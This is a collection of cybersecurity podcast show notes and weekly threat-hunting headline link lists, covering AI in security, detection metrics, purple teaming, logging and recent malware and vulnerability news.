In this conversation, I speak with Christine Gadsby, Head of Product Security Operations Team at BlackBerry. We talk about: The Role of AI in Cybersecurity: AI's real advancements, practical applications, and associated challenges, moving beyond the hype. Enhancing Incident Response and Threat Hunting Christine highlights AI's significant impact on enhancing incident response and threat hunting, how AI quickly analyzes vast data to identify Indicators of Compromise (IoCs), automates routine tasks, and improves decision-making with actionable insights. The Evolution of Blackberry in Cybersecurity Christine discusses Blackberry's shift from mobile devices to cybersecurity, emphasizing their focus on highly regulated environment and how the acquisition of Silence brought advanced AI capabilities, enhancing their security solutions. Among other topics. Intro (00:00:00)AI in Cybersecurity: Hype or Reality? (00:00:06)Incident Response and Threat Hunting (00:01:12)Automation in Security Programs (00:02:08)Industry-Specific AI Needs (00:03:20)AI's Role in Regulated Environments (00:04:23)Blackberry's AI Integration (00:04:50)Perceptions of Blackberry's Evolution (00:06:51)Trust in Vendor Relationships (00:09:11)AI's Potential in Monitoring (00:11:12)Challenges of Staffing in Cybersecurity (00:13:18)Staff Turnover in Cybersecurity (00:13:54)Burnout and Job Satisfaction (00:14:18)Hiring Challenges in Security (00:15:17)Confusion in Cyber Job Market (00:16:10)Job Changes Among Cyber Leaders (00:17:10)Outsourcing Security Functions (00:18:09)Pressure from Boards (00:18:57)Evolving Security Needs (00:19:40)Human Element in Cybersecurity (00:20:46)Talent Pipeline Issues (00:21:40)Challenges of Smaller Companies (00:22:32)Job Satisfaction and Workload (00:24:03)Pressure Cooker Environment (00:24:43)Crypto Attacks Resurgence (00:26:16)Crypto Mining Discussion (00:26:33)APT 32 Insights (00:27:22)Employee Training Importance (00:28:41)Indicators of Crypto Mining (00:29:45)Detection Challenges (00:30:30)Normal System Behavior (00:32:13)Looking Ahead to 2025 (00:32:44)*Supply Chain Pressures (00:35:08)Arms Race in Security (00:35:27)Liability Hot Potato (00:36:27)Managed Services Growth (00:36:44)Cyber Insurance Trends (00:37:52)CISO Evolution (00:39:10)The Importance of Trust in Supply Chain (00:39:56)Predictions for Cybersecurity Roles (00:40:46)Following Blackberry's Work (00:41:00)Networking and Future Conversations (00:41:05)Conclusion (00:41:37)Become a Member: https://danielmiessler.com/upgradeSee omnystudio.com/listener for privacy information.
Threat Hunting Workshop: Hunting for Command and Control 31 July 2024 | 12:00 - 1:00 pm ET Register Here! Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" | Secure your spot now at a discounted rate: 3-4 Aug 2024: Sign Up Here! 5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 29 July 2024 1. Bleeping Computer | Acronis Warns of Cyber Infrastructure Default Password Abused in Attacks https://www.bleepingcomputer.com/news/security/acronis-warns-of-cyber-infrastructure-default-password-abused-in-attacks/?&web_view=true 2. Guardio Labs | “EchoSpoofing” – A Massive Phishing Campaigns Exploiting Proofpoint's Email Protevtion to Dispatch Millions of Perfectly Spoofed Emails https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6?gi=b32e776ffab3 3. Esentire | Introducing Gh0stGambit: A Dropper for Deploying Gh0st RAT https://www.esentire.com/blog/a-dropper-for-deploying-gh0st-rat?&web_view=true 4. Check Point Research | Stargazers Ghost Network https://research.checkpoint.com/2024/stargazers-ghost-network/ 5. Help Net Security | Most CISO's Feel Unprepared for New Compliance Regulations https://www.helpnetsecurity.com/2024/07/26/cisos-compliance-regulations-preparedness/?web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Guest: Allyn Stott, Senior Staff Engineer, meoward.coOn LinkedIn | https://www.linkedin.com/in/whyallynOn Twitter | https://x.com/whyallyn____________________________Host: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]On ITSPmagazine | https://www.itspmagazine.com/sean-martinView This Show's Sponsors___________________________Episode NotesIn this episode of The Redefining CyberSecurity Podcast, host Sean Martin converses with Allyn Stott, who shares his insights on rethinking how we measure detection and response in cybersecurity. The episode explores the nuances of cybersecurity metrics, emphasizing that it's not just about having metrics, but having the right metrics that truly reflect the effectiveness and efficiency of a security program.Stott discusses his journey from red team operations to blue team roles, where he has focused on detection and response. His dual perspective provides a nuanced understanding of both offensive and defensive security strategies. Stott highlights a common issue in cybersecurity: the misalignment of metrics with organizational goals. He points out that many teams inherit metrics that may not accurately reflect their current state or objectives. Instead, metrics should be strategically chosen to guide decision-making and improve security posture. One of his key messages is the importance of understanding what specific metrics are meant to convey and ensuring they are directly actionable.In his framework, aptly named SAVER (Streamlined, Awareness, Vigilance, Exploration, Readiness), Stott outlines a holistic approach to security metrics. Streamlined focuses on operational efficiencies achieved through better tools and processes. Awareness pertains to the dissemination of threat intelligence and ensuring that the most critical information is shared across the organization. Vigilance involves preparing for and understanding top threats through informed threat hunting. Exploration encourages the proactive discovery of vulnerabilities and security gaps through threat hunts and incident analysis. Finally, Readiness measures the preparedness and efficacy of incident response plans, emphasizing the coverage and completeness of playbooks over mere response times.Martin and Stott also discuss the challenge of metrics in smaller organizations, where resources may be limited. Stott suggests that simplicity can be powerful, advocating for a focus on key risks and leveraging publicly available threat intelligence. His advice to smaller teams is to prioritize understanding the most significant threats and tailoring responses accordingly.The conversation underscores a critical point: metrics should not just quantify performance but also drive strategic improvements. By asking the right questions and focusing on actionable insights, cybersecurity teams can better align their efforts with their organization's broader goals.For those interested in further insights, Stott mentions his upcoming talks at B-Sides Las Vegas and Blue Team Con in Chicago, where he will expand on these concepts and share more about his Threat Detection and Response Maturity Model.In conclusion, this episode serves as a valuable guide for cybersecurity professionals looking to refine their approach to metrics, making them more meaningful and aligned with their organization's strategic objectives.___________________________Watch this and other videos on ITSPmagazine's YouTube ChannelRedefining CyberSecurity Podcast with Sean Martin, CISSP playlist:
Threat Hunting Workshop: Hunting for Command and Control 31 July 2024 | 12:00 - 1:00 pm ET Register Here! Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" | Secure your spot now at a discounted rate: 3-4 Aug 2024: Sign Up Here! 5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 22 July 2024 1. Popular Ukrainian Telegram Channels Hacked to Spread Russian Propaganda https://therecord.media/ukrainian-news-telegram-channels-hacked-russian-propaganda?&web_view=true 2. New Play Ransomware Linux Variant Targets ESXI Shows Ties with Prolific Puma https://www.trendmicro.com/en_us/research/24/g/new-play-ransomware-linux-variant-targets-esxi-shows-ties-with-p.html 3. Dragos Frostygoop Report https://regmedia.co.uk/2024/07/23/dragos_frostygoop-report.pdf 4. Likely Ecrome Actor Capitalizing on Falcon Sensor Issues https://www.crowdstrike.com/blog/likely-ecrime-actor-capitalizing-on-falcon-sensor-issues/ 5. Internet Organised Crime Threat Assessment 2024 https://www.europol.europa.eu/cms/sites/default/files/documents/Internet%20Organised%20Crime%20Threat%20Assessment%20IOCTA%202024.pdf ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Send us a Text Message.This month, we welcome Eric Gagnon, Team Lead of Adversary Simulation, Purple Teaming, and Tradecraft Development at Desjardins. The conversation covers a wide range of topics related to cybersecurity, including purple teaming, red teaming, blue teaming, and Eric's journey in cybersecurity. Eric shares insights on certifications, threat hunting, cloud security, and the importance of knowledge exchange between red and blue teams. He also discusses the use of AI in cybersecurity and the need to stay sharp in the field.TakeawaysPurple teaming involves collaborative operations to exchange ideas, evaluate security controls, and test out tactics, techniques, and procedures (TTPs) real threat actors use.Certifications in cybersecurity, such as Offensive Security Certified Professional (OSCP) and Offensive Security Certified Expert (OSCE), provide valuable knowledge and an edge in the field.Threat hunting involves looking for a granular activity that may indicate a compromise, filtering out the noise, and focusing on the suspicious behavior of threat actors.Cloud security requires automation, cyber hygiene, and visibility, focusing on prioritizing techniques and testing them against the enterprise's environment.Knowledge exchange between red and blue teams during a purple team engagement is essential and should include a common language, centralized documentation, and reporting against the MITRE ATT&CK framework.Staying sharp in cybersecurity involves continuous learning, participation in CTFs, engaging with passionate individuals, and challenging oneself through talks, podcasts, and specialized training.Chapters00:00Introduction to Purple Teaming and Cybersecurity Journey08:09Certifications and Insights in Cybersecurity15:08Threat Hunting and Granular Activity Detection35:02Knowledge Exchange in Purple Teaming: Red and Blue Collaboration39:57Staying Sharp in Cybersecurity: Continuous Learning and EngagementSecure applications from code to cloud.Prisma Cloud, the most complete cloud-native application protection platform (CNAPP).Disclaimer: This post contains affiliate links. If you make a purchase, I may receive a commission at no extra cost to you.
This Soap Box edition of the show is with Mike Wiacek, the CEO and Founder of Stairwell. Stairwell is a platform that creates something similar to an NDR, but for file analysis instead of network traffic. The idea is you get a copy of every unique file in your environment to the Stairwell platform, via a file forwarding agent. You get an inventory that lists where these files exist in your environment, at what times, and from there you can start doing analysis. If you find a dodgy file you can do all the usual malware analysis type stuff, but you can also do things like immediately find out where else that file is in your organisation, or even where else it was. From there you can identify other files that are similar – variants of those files – and search for those. And you can unpack all this very, very quickly. This is the type of tool that EDR companies use internally to do threat hunting, but it's just for you and your org – you can drive it. And as you'll hear, the idea of a transparent, customisable and programmable security stack is something that's on-trend at the moment. Mike lays out the case that doing this sort of file analysis in your organisation makes a whole lot of sense.
Threat Hunting Workshop: Hunting for Command and Control 31 July 2024 | 12:00 - 1:00 pm ET Register Here! Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" Regular Registration closes on July 19, 2024! Secure your spot now at a discounted rate: 3-4 Aug 2024: Sign Up Here! 5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 15 July 2024 1. Infosecurity Magazine | CISA Urges Software Makers to Eliminate OS Command Injection Flaws https://www.infosecurity-magazine.com/news/cisa-software-eliminate-command/?&web_view=true 2. Wazuh | Detecting Living Off the Land Attacks with Wazuh https://wazuh.com/blog/detecting-living-off-the-land-attacks-with-wazuh/ 3. ClickFIx Deception: A Social Engineering Tactic to Deploy Malware https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ 4. The Hacker News | 10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit https://thehackernews.com/2024/07/10000-victims-day-infostealer-garden-of.html?m=1 5. Blackberry | Coyote Banking Trojan Targets LATAM with a Focus on Brazillian Financial Institutions https://blogs.blackberry.com/en/2024/07/coyote-banking-trojan-targets-latam-with-a-focus-on-brazilian-financial-institutions?&web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
In this episode of Detection at Scale, Jack welcomes Christopher Watkins, Senior Staff Cloud Security Engineer at WP Engine, to discuss innovative logging solutions and efficient data management across multiple cloud platforms. Chris reveals how WP Engine leverages native tools and robust API gateways to streamline logging processes. He shares strategies for cost-effective threat hunting, such as optimizing large-scale queries through table partitioning. Chris also emphasizes the importance of mental and physical well-being, and the role of community support in maintaining a sustainable career in cybersecurity. Topics discussed: How WP Engine uses native tools and robust API gateways to manage logging across multiple cloud platforms efficiently. Strategies for optimizing large-scale queries, such as table partitioning and avoiding costly operations, to maintain efficiency and reduce expenses. Techniques for moving data efficiently across different cloud services, ensuring consistency and reliability in data management. The importance of partitioning tables and being selective with queries to enhance threat detection and incident response efforts. The role of a well-designed schema in speeding up threat detection by understanding key value pairs frequently used in security data. Leveraging best practices from data teams to optimize queries and improve security use cases. Ensuring human oversight with two-person reviews of scripts and dry runs to maintain accuracy and reliability in automated processes. The importance of mental, physical, and spiritual health routines to manage the stress of incident response and avoid burnout. The role of community and trusted conversations in sharing experiences about breaches, vulnerabilities, and other challenges in the cybersecurity field. How WP Engine's mantra of "detection as code" and "pipelines as code" extends to response workflows for increased efficiency and effectiveness. Resources Mentioned: Chris Watkins on LinkedIn WP Engine website
Threat Hunting Workshop: Hunting for Command and Control 31 July 2024 | 12:00 - 1:00 pm ET Register Here! Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" Regular Registration closes on July 19, 2024! Secure your spot now at a discounted rate: 3-4 Aug 2024: Sign Up Here! 5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 1 July 2024 1. Qualys Security Blog | Remote Unauthenticated Code Execution Vulnerability in OpenSSH Server https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server?web_view=true 2. ZScaler | Kimsuky Deploys TRANSLATEXT to Target South Korean Academia https://www.zscaler.com/blogs/security-research/kimsuky-deploys-translatext-target-south-korean-academia 3. The Register | Police Allege 'Evil Twin' In-Flight WiFi Used to Steal Info & Australian Federal Police | Man Charged Over Creation of 'Evil Twin' Free WiFi Networks to Access Personal Data https://www.theregister.com/2024/07/01/australia_evil_twin_wifi_airline_attack/?&web_view=true https://www.afp.gov.au/news-centre/media-release/man-charged-over-creation-evil-twin-free-wifi-networks-access-personal 4. GitHub | JPCERTCC/LogonTracer https://github.com/JPCERTCC/LogonTracer 5. Help Net Security | 75% of New Vulnerabilities Exploited Within 19 Days https://www.helpnetsecurity.com/2024/06/27/nvd-vulnerabilities/?web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" Regular Registration closes on July 19, 2024! Secure your spot now at a discounted rate: *3-4 Aug 2024: Sign Up Here! *5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 25 June 2024 1. Positive Technologies | ExCobalt: GORed, the hidden-tunnel technique https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/excobalt-gored-the-hidden-tunnel-technique/ 2. Cisco Talos | SneakyChef espionage group targets government agencies with SugarCh0st and more infection techniques https://blog.talosintelligence.com/sneakychef-sugarghost-rat/ 3. Help Net Security | 1 out of 3 breaches go undetected https://www.helpnetsecurity.com/2024/06/24/detecting-breaches-struggle-in-organizations/?web_view=true 4. Ars Technica | Dell said return to office or else - nearly half of the workers chose "or else" https://arstechnica.com/gadgets/2024/06/nearly-half-of-dells-workforce-refused-to-return-to-the-office/ 5. Infosecurity Magazine | Cybersecurity Burnout Costing Firms $700m+ Annually https://www.infosecurity-magazine.com/news/cybersecurity-burnout-costing-700m/?&web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" Regular Registration closes on July 19, 2024! Secure your spot now at a discounted rate: *3-4 Aug 2024: Sign Up Here! *5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 10 June 2024 1. Google Cloud | UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion 2. Morphisec | Howling at the Inxos: Sticky Werewolf's Latest Malicious Aviation Attacks https://blog.morphisec.com/sticky-werewolfs-aviation-attacks 3. Vonahi Security | Automated Penetration Testing & Cyber Security Services - Top 10 Crticial Pentest Findings Report https://www.vonahi.io/pentest-report-2024?utm=source=701Rp00000B6bue 4. The DFIR Report | IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/ 5. Zscaler | Technical Analysis of the Latest Variant of ValleyRAT https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
On this episode of The Cybersecurity Defenders Podcast, we talk network threat hunting with Chris Brenton, COO at Active Countermeasures.Chris is a dedicated professional with a passion for simplifying the process of threat hunting. Chris is deeply committed to enhancing cybersecurity knowledge through delivering both free and affordable security training. Alongside this, he plays a crucial role in the development of both open-source and commercially accessible threat hunting tools. Whether you're aiming to sharpen your threat hunting skills or are looking to establish a robust threat hunting program within your organization, Chris is the go-to expert. Stay tuned as we dive deeper into his journey, and feel free to reach out to him directly to learn more or get involved.You can find Chris on LinkedIn here.And you can find Chris in Twitter here.
In this episode, PhoneBoy talks about how AI can be used for Threat Hunting.How AI turbocharges your threat hunting game5 ways ChatGPT and LLMs can advance cyber security
Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" Early registration closes on May 24, 2024! Secure your spot now at a discounted rate: *3-4 Aug 2024: Sign Up Here! *5-6 Aug 2024: Sign Up Here! ----- Top 5 Threat Hunting Headlines - 22 May 2024 1. Kandji | Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware https://blog.kandji.io/malware-cuckoo-infostealer-spyware 2. Rapid7 | Ongoing Malvertising Campaign Leads to Ransomware https://www.rapid7.com/blog/post/2024/05/13/ongoing-malvertising-campaign-leads-to-ransomware/ 3. Unit 42 | Payload Trends in Malicious OneNote Samples https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/ 4. Check Point Research | Bad Karma, No Justice: Void Manticore Destructive Activities in Isreal https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/ 5. Aqua Nautilus | Kinsing Demystified - A comprehensive Technical Guide https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Have you ever noticed “threat hunting” in vendor products and wondered exactly what it means? James Williams is here to explain: Threat hunting is the R&D of detection engineering. A threat hunter imagines what an attacker might try and, critically, how that behavior would show up in the logs of a particular environment. Then the... Read more »
Have you ever noticed “threat hunting” in vendor products and wondered exactly what it means? James Williams is here to explain: Threat hunting is the R&D of detection engineering. A threat hunter imagines what an attacker might try and, critically, how that behavior would show up in the logs of a particular environment. Then the... Read more »
Top 5 Threat Hunting Headlines - 13 May 2024 1. Infosecurity Magazine | AI-Powered Russian Network Pushes Fake Political News https://www.infosecurity-magazine.com/news/aipowered-russian-network-fake-news/?&web_view=true 2. Elastic Security Labs | Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part Two https://www.elastic.co/security-labs/dissecting-remcos-rat-part-two 3. The Record | Cyberthreat Landscape Permanently Altered by Chinese Operations, US Officials Say https://therecord.media/cyberthreat-landscape-altered-chinese-operations?&web_view=true 4. Elastic Security Labs | Dissecting REMCOS RAT: An in- depth analysis of a widespread 2024 malware, Part Four https://www.elastic.co/security-labs/dissecting-remcos-rat-part-four 5. Help Net Security | How Secure is the "Password Protection" on Your Files and Drives? https://www.helpnetsecurity.com/2024/05/10/password-protect-pdf-excel-files/?web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Organizations fear adversaries will attack. Threat hunters assume adversaries are already in the system — and their investigations seek unusual behavior that may indicate malicious activity is afoot. Andrew Munchbach, CrowdStrike's VP of Global Enterprise Sales Engineering, joins Adam and Cristian in this week's episode to explore what threat hunting is, how it works, and what makes a good threat hunting program. As CrowdStrike's “Chief Reddit Officer”, Andrew also shares how he came to run CrowdStrike's Reddit account and discusses the platform's evolving role in communicating with the security community. Now with nearly 20,000 followers, CrowdStrike's Reddit account is used to share information — from key data on active attacks to weekly threat hunting exercises — with CrowdStrike customers and the general public.
Top 5 Threat Hunting Headlines - 22 April 2024 1. The Record | NATO to launch new cyber center to contest cyberspace 'at all times' https://therecord.media/nato-new-military-civilian-cyber-center-mons-belgium?&web_view=true 2. Securonix | Securonix Threat Research Knowledge Sharing Series: Detecting DLL Sideloading Techniques Found In Recent Real-world Malware Attack Chains https://www.securonix.com/blog/detecting-dll-sideloading-techniques-in-malware-attack-chains/ 3. Darkreading | Evil XDR: Researcher Turns Palo Alto Software Into Perfect Malware https://www.darkreading.com/application-security/evil-xdr-researcher-turns-palo-alto-software-into-perfect-malware?&web_view=true 4. HackTricks https://book.hacktricks.xyz 5. CSA | Deploying AI Systems Securely https://media.defense.gov/2024/Apr/15/2003439257/-1/-1/0/CSI-DEPLOYING-AI-SYSTEMS-SECURELY.PDF ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
In this episode of Storm⚡️Watch, we discuss a wide range of intriguing cybersecurity topics. A significant highlight of this episode is our discussion on the recent vulnerabilities discovered in CrushFTP. This popular file transfer software was found to have a critical remote code execution vulnerability, which has been actively exploited. The vulnerability, identified as CVE-2023-43177, allows unauthenticated attackers to execute arbitrary code and access sensitive data. Despite patches being released, the software remains a target for opportunistic attacks, emphasizing the need for users to update and secure their systems promptly. We also explore the cutting-edge realm of LLM (Large Language Model) agents with the capability to autonomously exploit and hack websites. Recent studies have shown that these agents can autonomously perform complex tasks like SQL injections and database schema extractions without prior knowledge of the vulnerabilities. This development poses new challenges and opportunities in cybersecurity, highlighting the dual-use nature of AI technologies in cyber offense and defense. Our "Tool Time" segment introduces listeners to the CPE Guesser tools, which aid in predicting Common Platform Enumeration names, helping cybersecurity professionals streamline their vulnerability management processes. In a lighter segment, "Shameless Self-Promotion," we celebrate GreyNoise's achievement of reaching '1337' status with their tagging system. We also provide updates on the latest cybersecurity trends with our "Tag Roundup," discussing recent and active campaigns, and conclude with a "KEV Roundup" where we discuss the Known Exploited Vulnerabilities catalog by CISA, providing listeners with crucial information on vulnerabilities that require immediate attention. As we wrap up the episode, we reflect on the discussions and insights shared, encouraging our listeners to stay proactive in managing cybersecurity risks. Forecast = The KEV drought continues well-into its second week, but a vulnerable frontal system could bring some much needed exploit rain. Storm Watch Homepage >> Learn more about GreyNoise >>
Top 5 Threat Hunting Headlines - 15 April 2024 1. Volexity | Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/ 2. Trend Micro | Cyberespionage Group Earth Hundun's Continuous Refinement of Waterbear and Deuterbear https://www.trendmicro.com/en_no/research/24/d/earth-hundun-waterbear-deuterbear.html 3. The Cyber Express | FatalRAT Targets Cryptocurrency Users With DLL Side-loading Techniques https://thecyberexpress.com/fatalrat-phishing-campaign/?&web_view=true 4. Elastic Security Labs | Linux detection engineering with Auditd https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd 5. NIST Special Publication | Incident Response Recommendations and Considerations for Cybersecurity Risk Management https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r3.ipd.pdf ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
**[LIVE] Out of the Woods Podcast Episode April 4, 2024 | 7:00 - 8:30 PM ET More Details/Registration
Check out this interview from the ESW Vault, hand picked by main host Adrian Sanabria! This segment was originally published on September 22, 2021. Chris will discuss the relevance of intelligence and threat hunting today and how they work together. He will also talk about his EASY framework for creating impactful intelligence and its relation to hunting! Show Notes: https://securityweekly.com/vault-esw-8